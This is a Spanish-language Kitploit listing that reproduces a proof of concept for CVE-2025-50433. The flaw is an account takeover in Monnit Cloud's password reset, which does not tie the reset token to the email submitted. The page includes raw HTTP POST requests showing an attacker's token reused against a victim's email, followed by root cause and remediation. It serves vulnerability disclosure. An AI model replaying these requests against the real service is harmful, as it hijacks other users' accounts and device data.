Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-50433 — Prueba de concepto para una toma de control crítica de cuentas en Monnit Cloud (CVE-2025-50433), que explota la falta de validación de token-correo en el restablecimiento de contraseña y proporciona pasos de ataque, causa raíz y remediación. | Kitploit
Herramientas/GitHubGitHub/0xmandor/cve-2025-50433
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de PenetraciónAutenticación
GitHub0xmandor/cve-2025-50433

CVE-2025-50433

Prueba de concepto para una toma de control crítica de cuentas en Monnit Cloud (CVE-2025-50433), que explota la falta de validación de token-correo en el restablecimiento de contraseña y proporciona pasos de ataque, causa raíz y remediación.

Ver Repositorio
1hace 9 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-50433 — Vulnerabilidad crítica de apropiación de cuentas que afecta a las plataformas Monnit Cloud (*.imonnit.com)

Resumen

Existe una vulnerabilidad crítica de autenticación en *.imonnit.com que permite la apropiación total de cuentas (ATO) en cualquier cuenta de usuario sin interacción de la víctima. El backend no valida la asociación entre el token de restablecimiento de contraseña y el correo electrónico objetivo, lo que permite a los atacantes usar su propio token de restablecimiento válido para restablecer la contraseña de cualquier cuenta de víctima.


Vector de ataque (PoC paso a paso)

  1. El atacante crea la cuenta A ([email protected]).
  2. La víctima tiene la cuenta B ([email protected]).
  3. El atacante solicita el restablecimiento de contraseña tanto para A como para B.
  4. El atacante recibe un token de restablecimiento válido solo para la cuenta A.
  • El atacante abre el formulario de restablecimiento de contraseña usando el token A:
  • root@kitploit:~
        POST /Account/PasswordReset/?VerificationCode=TTT4EB4I HTTP/1.1
        Host: www.imonnit.com
        Cookie: ASP.NET_SessionId=jf3y4eg3qdrefnfnqcj42yut; __RequestVerificationToken=dObesuZNYwsn9USVixM8aZTa9i_E_18PRpfCE0L39NUJlfolWpjSYX0BW32_mK50O5fcGbr3oBMg2S6D4ONl0bJhJS4kmxtHeQEn8Y0kNNt324q5Hc0Gu3JBHH7CwrylvP8XNQ2
    
        __RequestVerificationToken=-realtoken5K0nzPC8H2Aw2&NewPassword=1!Password%21&ConfirmPassword=1!Password%21&[email protected]&[email protected]
    
    1. Antes de enviar, el atacante cambia los campos de correo electrónico y nombre de usuario al correo de la víctima:
    root@kitploit:~
        POST /Account/PasswordReset/?VerificationCode=TTT4EB4I HTTP/1.1
        Host: www.imonnit.com
        Cookie: ASP.NET_SessionId=jf3y4eg3qdrefnfnqcj42yut; __RequestVerificationToken=dObesuZNYwsn9USVixM8aZTa9i_E_18PRpfCE0L39NUJlfolWpjSYX0BW32_mK50O5fcGbr3oBMg2S6D4ONl0bJhJS4kmxtHeQEn8Y0kNNt324q5Hc0Gu3JBHH7CwrylvP8XNQ2
    
        __RequestVerificationToken=-realtoken5K0nzPC8H2Aw2&NewPassword=1!Password%21&ConfirmPassword=1!Password%21&[email protected]&[email protected]
    
    1. El backend acepta incorrectamente el correo electrónico + token no coincidentes.
    2. Se restablece la contraseña de la víctima y el atacante obtiene acceso completo a la cuenta de la víctima.

    Impacto

    • Apropiación total de cuentas (ATO).
    • Acceso completo a los paneles de control, sensores y datos de la cuenta de la víctima.
    • Capacidad de modificar dispositivos, notificaciones y configuraciones.
    • Escalada de privilegios sin interacción de la víctima.
    • Explotación remota sin requisitos previos.

    Gravedad

    CVSS 3.1: 9.8 (Crítico)
    Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H


    Dominios afectados

    root@kitploit:~
    *.imonnit.com
    

    Causa raíz

    El endpoint de restablecimiento de contraseña no valida que el token de restablecimiento pertenezca al mismo correo electrónico proporcionado durante la operación de restablecimiento, lo que permite restablecimientos arbitrarios de contraseña utilizando tokens controlados por el atacante.


    Endpoint afectado

    root@kitploit:~
    /Account/PasswordReset/
    

    Vendedor: Monnit Corporation


    Recomendaciones

    • Imponer una validación estricta de vinculación token-correo en el backend.
    • Rechazar cualquier solicitud de restablecimiento de contraseña donde el token no coincida con la cuenta asociada.
    • Invalidar los tokens inmediatamente después de su uso.

    Descubridor

    Mohamed Mandor (0xmandor) GitHub: https://github.com/0xmandor

    Descargar herramienta